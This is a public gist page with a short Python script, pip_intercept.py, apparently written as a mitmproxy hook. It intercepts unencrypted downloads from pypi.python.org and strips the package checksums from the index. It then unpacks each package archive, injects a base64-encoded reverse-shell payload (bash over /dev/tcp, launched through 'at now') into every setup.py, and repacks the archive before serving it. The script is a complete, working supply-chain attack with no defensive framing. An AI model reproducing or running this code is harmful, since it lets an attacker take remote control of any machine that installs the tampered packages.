public
anonymous / pip_intercept.py
Created

  • Download Gist
pip_intercept.py
Python
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43
# -*- coding: utf-8 -*-
#
 
import tempfile
import sys, os
import re
 
LHOST, LPORT = ('127.0.0.1', '4444')
 
PAYLOAD = (r'''os.system('echo "bash -c \'0<&76-;exec 76<>/dev/tcp/%s/%s;
sh <&76 >&76 2>&76\'" | at now 2>/dev/null')''' % (LHOST, LPORT))
 
PAYLOAD = PAYLOAD.replace('\n', '')
 
 
def response(context, flow):
if not 'Content-Type' in flow.response.headers:
return None
 
if flow.request.get_url().startswith('http://pypi.python.org/simple/'):
flow.response.content = re.sub(r'#md5=[a-f0-9]+', '', flow.response.content)
 
if flow.response.headers['Content-Type'][0] == 'application/octet-stream'\
and flow.request.host == 'pypi.python.org':
 
tmp_dir = tempfile.mkdtemp()
os.chdir(tmp_dir)
 
filename = flow.request.get_path_components()[-1]
 
open(filename, 'wb').write(flow.response.content)
 
os.mkdir('extracted')
os.system('aunpack -X '+tmp_dir+'/extracted '+filename)
 
os.system(r'''find . -iname setup.py | xargs sed -i '/setup(/ i\exec ("%'''
'''s".decode("base64"))' ''' %
PAYLOAD.encode('base64').replace('\n', ''))
 
os.chdir('extracted')
os.system('apack -f ../%s *' % filename)
 
flow.response.content = open('../%s' % filename, 'rb').read()

Please sign in to comment on this gist.

Something went wrong with that request. Please try again.